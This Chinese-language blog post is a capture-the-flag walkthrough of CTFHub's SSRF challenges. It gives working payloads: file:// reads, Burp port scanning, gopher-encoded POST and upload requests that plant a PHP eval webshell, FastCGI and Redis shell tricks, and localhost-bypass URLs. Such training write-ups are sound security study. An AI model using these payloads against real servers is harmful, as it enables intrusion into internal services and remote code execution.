首页 > 其他分享 >cthub-ssrf通关攻略

cthub-ssrf通关攻略

时间:2024-08-28 19:59:18浏览次数:9  
标签:127.0 http ssrf 0.1 250D% flag 攻略 链接 cthub

内网访问 

一.进入页面,选择内网访问

二.开启题目,点击题目中的链接

 然后就进来页面了

三.在url里输入

http://127.0.0.1/flag.php就可以得到flag 

四.提交flag

伪协议读取文件

一开启题目

二.点击进入链接 

三.输入file:///var/www/html/flag.php 然后发现页面不显示,查看页面源代码然后就得到flag

端口扫描 

一.开启端口扫描点击如图中链接

二.进入如图所示页面输入http://127.0.0.1:8000 

 

 三.打开burp抓包,发送到攻击器

先清除playload然后再8000的地方上添加playload 

 四.如图所示修改里面的值

 五.跑出来之后点开响应包可以查看flag

post请求

一.开启题目,点击题目链接 

 二.输入http://127.0.0.1/flag.php弹出一个框

打开页面源代码,复制key粘贴到提交框中 

 三.打开brup抓包,将抓到的数据留下如图所示内容修改为gopher构造post请求数据包

四.将里面内容进行俩次url编码 

五.然后关闭抓包,再次回到页面

六.输入gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0D%0AHost:127.0.0.1:80%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=6800122d69cd52dcc2aa3dafbe6c1c3c%0D%0A编号的url编码最后得出flag 

上传文件

一.点击开启,点入所给出的链接

二.进入浏览页面输入http://127.0.0.1/flag.php

出现上次文件

 发现没有提交按钮,我们自己往上写一个提交按钮

然后我们在自己写1.txt个文件进行提交

三.然后打开brup抓包 

在抓包页面进行编辑 

四.将抓好的内容进行俩次编码 

 五. 输入编码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:127.0.0.1:80%250D%250AUser-Agent:%2520Mozilla/5.0%2520(Windows%2520NT%252010.0;%2520Win64;%2520x64;%2520rv:129.0)%2520Gecko/20100101%2520Firefox/129.0%250D%250AAccept:%2520text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8%250D%250AAccept-Language:%2520zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2%250D%250AAccept-Encoding:%2520gzip,%2520deflate%250D%250AContent-Type:%2520multipart/form-data;%2520boundary=---------------------------13738711502688661258731329629%250D%250AContent-Length:%2520381%250D%250AOrigin:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800%250D%250AConnection:%2520close%250D%250AReferer:%2520http://challenge-9da34af1f24d33c6.sandbox.ctfhub.com:10800/?url=http://127.0.0.1/flag.php%250D%250AUpgrade-Insecure-Requests:%25201%250D%250APriority:%2520u=0,%2520i%250D%250A%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522file%2522;%2520filename=%25221.php%2522%250D%250AContent-Type:%2520application/octet-stream%250D%250A%250D%250A%253C?php%2520@eval($_POST%255B'cmd'%255D);?%253E%250D%250A-----------------------------13738711502688661258731329629%250D%250AContent-Disposition:%2520form-data;%2520name=%2522submit%2522%250D%250A%250D%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250D%250A-----------------------------137387115026886612587313296%250D%250A得到flag进行提交

FastCGl协议

开启题目

打开kali运行如图所示命令 ,利用一句话木马进行base64编码

 将上图所得的链接去url编码

然后访问shell.php 

 打开中国菜刀进行链接

链接成功后可在根目录下查看flag 

进行提交flag 

redis协议 

开启题目

进入kali输入如图所示命令 

 

将kali里给出的链接进行url编码 

编码后进行访问 

利用菜刀链接网站进入根查看flag 

提交flag 

urlbypass 

 进入链接

然后会看到下面有链接,将http://notfound.ctfhub.com输入url里面后面加上@127.0.0.1 /flag.php就会得到flag

 

 

 

数字ip bypass

开启题目,进入链接

 

 在链接后面输入http://0x7f000001/flag.php就可以得出flag

 

302跳转 

点击开启,进入链接

在后面输入http://localhost/flag.php ,然后就得出flag

dns重绑定bypass 

开启题目点击进入链接

 

输入http://localhost/flag.php就可以得到flag

 

标签:127.0,http,ssrf,0.1,250D%,flag,攻略,链接,cthub
From: https://blog.csdn.net/m0_75036923/article/details/141601398

相关文章

  • sqli-labs靶场通关攻略(41-50)
    Less-41 步骤一:查看数据库名?id=-1unionselect1,2,database()--+步骤二:查看表名?id=-1unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+步骤三:查看users表中列名?id=-1unionselect1,group_concat(......
  • 突破编程 C++ 设计模式(组合模式)详尽攻略
    在软件开发中,设计模式为程序员提供了解决特定问题的最佳实践。设计模式不仅提高了代码的可复用性和可维护性,还能帮助团队更好地进行协作。在这篇文章中,我们将深入探讨组合模式——一种结构型设计模式。组合模式允许你将对象组合成树形结构来表示“部分-整体”的层次关系。组合......
  • SEM论文攻略
    1.名词解释Variables(变数)-统计分析的基本要素,分成潜在变数舆观察变数两种-研究目的在于了解变数之间的关係Observed(measured,indicatorormanifest)variables(观察变数):-可以直接观察或测量的变数,如血压、销货量价格、所得等。Latent(unobservedvariables,fa......
  • 解除 Excel 表格的文档保护全攻略
    在日常工作和学习中,我们可能会遇到Excel表格被保护无法编辑的情况。别担心,今天就为大家分享几种解除Excel表格文档保护的方法。一、导入腾讯文档可以将受保护的Excel表格上传到腾讯文档。在部分情况下,腾讯文档会尝试自动解除表格保护,这样你就能够编辑内容了。如果......
  • 用 Higress AI 网关降低 AI 调用成本 - 阿里云天池云原生编程挑战赛参赛攻略
    作者介绍:杨贝宁,爱丁堡大学博士在读,研究方向为向量数据库《Higress AI网关挑战赛》正在火热进行中,Higress社区邀请了目前位于排行榜top5的选手杨贝宁同学分享他的心得。下面是他整理的参赛攻略:背景我们要在Higress网关中编写WebAssembly(wasm)插件,使得在http请求的各个......
  • 科研项目管理工具选型全攻略
    国内外主流的10款科研院所项目管理系统对比:PingCode、Worktile、云效、Tower、ZohoProjects、Notion、Wrike、ClickUp、Asana、Teambition。在科研院所的日常运营中,项目管理系统的选择显得尤为重要。选择不当可能导致资源浪费、进度延误甚至项目失败,这是每个科研团队都希望......
  • 8月更新|国内可用的ChatGPT攻略镜像中文网站
    如何有效地向ChatGPT提问?当熟练编写如上例所示的详细和明确的提示时,可以开始使用更高级的提示策略,以从ChatGPT中获得更多收益。此外,这也将有助于生成式AI工具的发展和改进。以下是六种策略可供尝试。设置自定义指令 从2023年8月起,所有用户(包括免费和Plus订阅用户......
  • sql-labs36-40通关攻略
    第36关一.判断闭合点http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+二.查询数据库http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(......
  • sqli-labs靶场通关攻略(36-40关)
    第36关(宽字节注入(BypassMySQLRealEscapeString))查数据库?id=-1%df%27%20union%20select%202,database(),3%20--+ 查表?id=-1%df'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+查列?id=-1%df'uni......
  • SSRF漏洞
    ssrf原理比如:A网站,是一个所有人都可以访问的外网网站,B网站是一个他们内部的OA网站。所以,我们普通用户只可以访问A网站,不能访问B网站。但是我们可以通过A网站做中间人,访问B网站,从而达到攻击B网站需求。总结SSRF漏洞就是通过篡改获取资源的请求发送给服务器,但是服务器并没有......